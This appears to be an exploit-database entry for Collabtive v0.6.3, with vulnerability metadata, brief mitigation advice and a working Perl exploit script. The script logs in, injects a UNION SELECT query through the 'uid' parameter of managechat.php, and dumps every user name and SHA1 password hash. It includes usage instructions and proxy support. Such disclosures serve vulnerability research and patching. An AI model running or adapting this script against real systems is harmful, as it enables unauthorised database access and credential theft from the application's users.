Collabtive v0.6.3 Multiple Vulnerabilities

vendor:

Collabtive

by:

DNX

7.5

CVSS

HIGH

Arbitrary File Upload, SQL Injection

89, 352

CWE

Product Name: Collabtive

Affected Version From: Collabtive v0.6.3

Affected Version To: Collabtive v0.6.3

Patch Exists: NO

Related CWE:

CPE: a:collabtive_project:collabtive:0.6.3

Metasploit:

Other Scripts:

Platforms Tested:

2010

Collabtive v0.6.3 Multiple Vulnerabilities

The script is vulnerable to SQL injection because it fails to properly sanitize user-supplied input to the 'uid' parameter in the 'managechat.php' script. An attacker can exploit this vulnerability to execute arbitrary SQL code on the underlying database. Additionally, the script is also vulnerable to arbitrary file upload, allowing an attacker to upload malicious files to the server. This vulnerability was first discovered and reported by DNX. The password stored in the database is encoded with sha1.

Mitigation:

To mitigate the SQL injection vulnerability, it is recommended to implement proper input validation and parameterized queries. To mitigate the arbitrary file upload vulnerability, it is recommended to implement file type validation and restrict file uploads to trusted locations. It is also recommended to keep the software up to date with the latest patches and security updates.

Source

Exploit-DB raw data:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2o1o    |
#    --------------------------------------------------
#    |   Collabtive v0.6.3 Multiple Vulnerabilities   |
#    --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
#                     Das Projekt startete im November 2007. Es ist eine
#                     Open-Source-Software und stellt eine Alternative zu proprietären
#                     Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
#
#                     Collabtive wird von einem professionellen Team entwickelt.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
#                     12: $userto_id = getArrayVal($_GET, "uid");
#
#                     64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
#                     The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
#                     See http://www.milw0rm.com/exploits/7076 more details.
#

if(!$ARGV[5])
{
  print "\n                       \\#'#/                   ";
  print "\n                       (-.-)                    ";
  print "\n   ---------------oOO---(_)---OOo---------------";
  print "\n   |  Collabtive v0.6.3 SQL Injection Exploit  |";
  print "\n   |               coded by DNX                |";
  print "\n   ---------------------------------------------";
  print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
  print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
  print "\n[!] Options:";
  print "\n       -user [text]    Username";
  print "\n       -pass [text]    Password";
  print "\n       -p [ip:port]    Proxy support";
  print "\n";
  exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua      = LWP::UserAgent->new();
my $cookie  = HTTP::Cookies->new();
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $target  = "http://".$host.$path;
my $user    = "";
my $pass    = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit
{
  ##############
  # make login #
  ##############
  
  my $url = $target."manageuser.php?action=login";
  my $res = $ua->post($url, [username => $user, pass => $pass]);
  $cookie->extract_cookies($res);
  $ua->cookie_jar($cookie);
  
  ############################
  # get users with passwords #
  ############################
  
  $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
  $res = $ua->get($url);
  my $content = $res->content;
  
  my @c = split(/<br \/>/, $content);
  foreach (@c)
  {
    if($_ =~ /<b>(.*?):<\/b> (.*)/)
    {
      print $1.":".$2."\n";
    }
  }
}